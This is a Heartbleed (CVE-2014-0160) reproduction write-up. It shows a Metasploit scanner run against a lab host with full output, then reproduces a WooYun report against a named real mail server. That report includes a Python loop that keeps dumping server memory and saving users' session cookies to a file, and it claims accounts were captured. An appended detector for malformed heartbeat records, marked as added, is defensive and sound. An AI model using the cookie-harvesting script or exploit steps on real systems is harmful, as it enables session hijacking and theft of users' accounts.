HEARTBLEED Vulnerability Reproduction
Two articles analyzing the vulnerability
https://blog.csdn.net/javajiawei/article/details/82429886
You need to run set verbose true to see the output below.
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
rhosts => 172.16.20.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 172.16.20.134:443 - Sending Client Hello...
[*] 172.16.20.134:443 - SSL record #1:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 86
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 82
[*] 172.16.20.134:443 - Type: Server Hello (2)
[*] 172.16.20.134:443 - Server Hello Version: 0x0301
[*] 172.16.20.134:443 - Server Hello random data: 5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
[*] 172.16.20.134:443 - Server Hello Session ID length: 32
[*] 172.16.20.134:443 - Server Hello Session ID: cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
[*] 172.16.20.134:443 - SSL record #2:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 909
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 905
[*] 172.16.20.134:443 - Type: Certificate Data (11)
[*] 172.16.20.134:443 - Certificates length: 902
[*] 172.16.20.134:443 - Data length: 905
[*] 172.16.20.134:443 - Certificate #1:
[*] 172.16.20.134:443 - Certificate #1: Length: 899
[*] 172.16.20.134:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
[*] 172.16.20.134:443 - SSL record #3:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 331
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 327
[*] 172.16.20.134:443 - Type: Server Key Exchange (12)
[*] 172.16.20.134:443 - SSL record #4:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 4
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 0
[*] 172.16.20.134:443 - Type: Server Hello Done (14)
[*] 172.16.20.134:443 - Sending Heartbeat...
[*] 172.16.20.134:443 - Heartbeat response, 65535 bytes
[+] 172.16.20.134:443 - Heartbeat response with leak
[*] 172.16.20.134:443 - Printable info leaked:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
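WooYun case
Details:
Fortinet mail server URL: https://mail.fortinet.com.cn
Vulnerable port: 443
This port is affected by CVE-2014-0160, the Heartbleed vulnerability; each request can read 64 KB of server memory.
First, the test output from the handy openssl.py tool: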

Account cookies are visible in the output; the following script can be used to keep capturing cookies:
import os
import re
import time

accounts = []  # session/cookie pairs already recorded
while True:
    # Run the openssl.py tool and read back the memory it printed
    result = os.popen('openssl.py mail.fortinet.com.cn').read()
    matches = re.findall(r'session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)
    for match in matches:
        if match not in accounts:
            accounts.append(match)
            with open('accounts.txt', 'a') as inFile:
                inFile.write(str(match) + '\n')
            print('New Account:', match)
    time.sleep(1.0)
After capturing for a short while there were already three:

Proof of vulnerability:


Fix:
Patch
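The bounds check that the OpenSSL fix for CVE-2014-0160 applies to incoming heartbeat messages, written here as a detector over captured TLS bytes (an added example, not code from the original post; the function names and sample bytes are constructed). It assumes the heartbeat is sent in plaintext, as in the Metasploit trace above where it follows Server Hello Done.

```python
import struct

HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding

def iter_records(stream):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    off = 0
    while off + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, off)
        fragment = stream[off + 5:off + 5 + length]
        if len(fragment) < length:   # truncated capture, stop here
            return
        yield ctype, fragment
        off += 5 + length

def check_heartbeat(fragment):
    """Return None for a well-formed message, else the reason it is rejected."""
    if len(fragment) < 1 + 2 + MIN_PADDING:
        return "record too short for type, length and padding"
    _hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    if 1 + 2 + claimed + MIN_PADDING > len(fragment):
        return "payload_length %d does not fit in %d-byte record" % (
            claimed, len(fragment))
    return None

def scan(stream):
    """Return [(record_index, reason)] for malformed plaintext heartbeats."""
    findings = []
    for index, (ctype, fragment) in enumerate(iter_records(stream)):
        reason = check_heartbeat(fragment) if ctype == HEARTBEAT else None
        if reason:
            findings.append((index, reason))
    return findings

def record(ctype, fragment, version=0x0301):
    """Build one TLS record (helper for the constructed samples below)."""
    return struct.pack("!BHH", ctype, version, len(fragment)) + fragment

# Constructed sample bytes, not captured traffic.
HELLO_DONE = record(22, b"\x0e\x00\x00\x00")            # Server Hello Done
GOOD = record(HEARTBEAT, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * 16)
NO_PADDING = record(HEARTBEAT, struct.pack("!BH", 1, 0x4000))
OVERCLAIM = record(HEARTBEAT, struct.pack("!BH", 1, 0x4000) + b"\x00" * 16)
SAMPLE = HELLO_DONE + GOOD + NO_PADDING + OVERCLAIM

if __name__ == "__main__":
    for index, reason in scan(SAMPLE):
        print("record %d: %s" % (index, reason))
```

Heartbeats sent after the handshake completes are encrypted, so a passive check like this cannot inspect their length fields.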